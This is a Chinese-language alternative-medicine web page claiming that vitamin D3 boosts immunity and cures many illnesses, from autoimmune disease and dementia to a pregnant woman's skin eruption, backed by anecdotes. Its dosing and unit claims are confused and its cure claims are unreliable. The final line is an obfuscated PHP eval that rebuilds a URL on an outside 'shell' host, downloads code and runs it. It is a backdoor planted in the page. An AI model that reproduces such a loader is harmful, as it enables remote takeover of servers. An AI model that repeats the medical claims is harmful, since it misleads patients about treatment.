收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow D3強化人體免疫力
D3強化人體免疫力 列印 E-mail
        一般市面上所謂的維他命D大多指D2,但很多卻假冒標示為D3。D2的單位為IU(國際單位),而D3的單位為Microgram(微克),其最主要的功能是把鈣帶到身體最需要鈣的地方。

        人體最需要鈣的地方為骨髓。中醫云:「腎主骨髓,腎主先天氣」,意指腎與免疫功能有極大的關係;人體缺鈣時會抽筋,中醫云:「肝主筋膜」。西醫則認為身體最大的免疫器官是肝,所以結合中西醫的概念,D3與人體免疫功能有重大關係!可惜的是,現代醫界還難以接受這種說法。

        西元二OO一年十二月,美國有醫學論文(by Ashton F.Embry)發表維他命D3可以預防與壓抑多種自體免疫疾病,諸如:類風濕性關節炎、紅斑性狼瘡、自體免疫性腦脊髓炎、第一型糖尿病…;同年六月,三軍總醫院研究證實D3可以幫助腦細胞活化;三總為中風的老鼠注射維他命D3,結果注射D3的老鼠比未注射D3的老鼠,腦缺血的體積少了一半。

        由此可知,無論自體免疫疾病,或氣喘、過敏性鼻炎、食物過敏、異味性皮膚炎…等過敏症,骨質疏鬆、植牙手術與其他各種手術前、中風、巴金森、老人癡呆症、過動兒、情緒障礙…等,均可由補充足量的D3而達到症狀改善與緩解的效果。
 
D3影響鈣的平衡

        在臨床上,我發現D3對鈣的平衡是極為關鍵的角色,D3不足會造成骨質疏鬆或抽筋,而常見的臨床症狀如夜間磨牙、習慣性眨眼,均可由補充D3來改善症狀。

        事實上,台灣大多數人都已從骨頭湯、雞湯、魚湯……等食物中攝取足夠的鈣,只是因為缺乏D3,而造成鈣在身體分佈的位置不對而導致疾病;例如鈣沉積在血管壁會造成動脈硬化,鈣沉積在水晶體會造成白內障。D3可以把鈣帶到骨髓中,骨髓是製造各類型血球最重要的地方,可治療骨質疏鬆,更可對各種血液疾病有幫助。如果使用得當,長者們的牙齒、骨骼都能更為健康,因為長年補充D3,我父親到八十八歲植牙都不需要補任何的骨粉。

        有一位朋友因車禍造成小腿脛骨及腓骨骨折,手術後每日給予十二顆0.25微克的D3,疼痛與水腫明顯消失;卻因未再來診所取藥,一個月後,疼痛與水腫復現。再服用D3兩天後,疼痛與水腫明顯又消失,此時他才深信D3對他骨折術後恢復的重大意義。

        臨床上我曾看過一個孕婦,在懷孕八個月時全身皮膚潰爛、奇癢無比,婦產科醫師告訴患者,此為「胎毒」,在經過我處方一天使用5 Microgram(微克)的D3(每天服用二十顆0.25微克的D3),兩週後,皮膚完全恢復健康。此乃因為D3可以把足夠的鈣同時供應母親與胎兒,幫助骨骼發育與提升免疫功能,所謂的胎毒症,也就因此消失無蹤。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));